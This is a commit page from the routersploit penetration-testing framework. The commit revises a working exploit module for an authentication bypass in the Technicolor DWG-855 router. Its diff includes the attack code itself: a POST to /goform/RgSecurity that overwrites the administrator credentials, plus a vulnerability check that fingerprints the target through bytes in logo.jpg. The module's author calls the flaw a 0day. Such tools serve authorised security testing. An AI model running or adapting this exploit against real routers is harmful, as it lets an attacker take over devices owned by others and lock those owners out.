Skip to content

R
routersploit
Commit 604604cf by Marcin Bury
Options

Little improvements for Technicolor DWG855 Auth Bypass exploit

parent 3660f72d
Showing with 10 additions and 8 deletions
routersploit/modules/exploits/technicolor/dwg855_authbypass.py
...@@ -16,11 +16,11 @@ class Exploit(exploits.Exploit): ...@@ -16,11 +16,11 @@ class Exploit(exploits.Exploit):
If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters. If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
""" """
__info__ = { __info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.', 'name': 'Technicolor DWG-855 Auth Bypass',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.', 'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
'authors': [ 'authors': [
'JPaulMora <https://JPaulMora.GitHub.io>', 'JPaulMora <https://JPaulMora.GitHub.io>', # vulnerability discovery, routersploit module
# vulnerability discovery,routersploit module '0BuRner', # routersploit module
], ],
'references': [ 'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.', 'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
...@@ -39,6 +39,8 @@ class Exploit(exploits.Exploit): ...@@ -39,6 +39,8 @@ class Exploit(exploits.Exploit):
vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg" vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self): def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass) print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'} headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
...@@ -47,13 +49,13 @@ class Exploit(exploits.Exploit): ...@@ -47,13 +49,13 @@ class Exploit(exploits.Exploit):
response = http_request(method="POST", url=url, headers=headers, data=data) response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None: if response is None:
print_error("Target didn't answer request.") print_error("Target did not answer request")
elif self.vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401: elif response.status_code == 401:
print_error("Target answered, denied access.") print_error("Target answered, denied access.")
else: else:
print_error("Unknown error, submit an issue.") print_success("Credentials changed")
else:
print_error("Exploit failed - Target seems to be not vulnerable")
@mute @mute
def check(self): def check(self):
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment